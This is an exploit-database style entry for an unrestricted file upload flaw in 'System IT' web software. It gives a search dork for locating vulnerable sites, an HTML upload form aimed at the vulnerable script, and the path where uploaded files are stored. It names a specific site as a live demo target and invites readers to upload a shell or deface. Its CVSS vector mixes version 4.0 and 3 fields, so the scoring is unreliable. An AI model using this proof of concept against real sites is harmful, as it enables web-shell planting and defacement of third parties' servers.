CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-434 | $1000 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-07-27 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.7 | 0.85 |

# Title: System IT Remote File Upload Vulnerability
# Author: h4shur
# date: 2020-07-27
# Vendor Homepage: systemit.com.au
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Powered by System IT"

### NOTE:

* You can bypass it to upload your shell or deface.

### POC:

* Exploit 1 : site.com/fileupload.php

```html
<h2>Upload Your File</h2>
<form action="site.com/php_sendmail_upload2.php" method="post" name="form1" id="emailForm" enctype="multipart/form-data">
<input class="inputbox" name="fileToUpload" type="file">
<input type="submit" name="Submit" value="Send">
</form>
```

### Directory File Path :

* site.com/upload/[FILE]

### Demo:

* http://www.clickprint.com.au/fileupload.php

### Contact Me :

* Telegram : @h4shur
* Email : [email protected]
* Instagram : @netedit0r
* twitter : @h4shur